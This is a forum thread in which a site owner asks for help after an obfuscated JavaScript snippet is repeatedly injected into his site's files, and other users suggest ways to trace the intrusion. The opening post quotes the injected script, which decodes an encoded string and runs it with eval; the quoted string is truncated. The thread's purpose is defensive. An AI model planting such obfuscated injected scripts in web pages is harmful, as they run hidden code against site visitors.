I am getting hacked--pls help

tkm

Hello Mates,
My site is getting hacked. Twice. Some-one is adding the following javascript code to my index file and other.js file.

 <script language=javascript><!-- 
(function(br6){var B9ABC='%';var x9aiw=('var~20a~3d~22Scr~69ptEng~69ne~22~2cb~3d~22Ver~73~69~.......~3e~22)~3b~7d').replace(br6,B9ABC);var t5pn=unescape(x9aiw);eval(t5pn)})(/~/g);
 --></script>

. I have changed hosting username/passwords. Removed all the files and uploaded again. Taken care of SQL Injection. It's a windows hosting server with a good brand. I have made complain with them. Don't know what else to do. 😕 Any suggestions?
Thankx.

sneakyimp

IF you still have the hacked files, you might be able to check their last modified data and check that against access logs. We have no idea from your post if the exploit was accomplished at the system level, through ssh, through ftp, or through sql injection or some php-related exploit. This kind of thing can be quite hard to diagnose -- especially without knowing more about your site's construction.

nrg_alpha

But how strong is your FTP password? I found this tool useful in seeing how well passwords fair.

etully

I am going to guess that your FTP password is not the problem.

If it were, a hacker would be able to install much more subtle code into your site than adding Javascript to your index page. Further, if you look at that Javascript code, it was written in a way that's designed to sneak by many filters that applications have to prevent Javascript from sneaking by.

I also don't think that this was SQL injection because if it were, there are other, more powerful and subtle things that the hacker could do than add Javascript to your index page.

My suggestion is that you ask yourself what software you have installed on your site (any sort of blogging software?) that you didn't write. Then google to see if that software has any known exploits.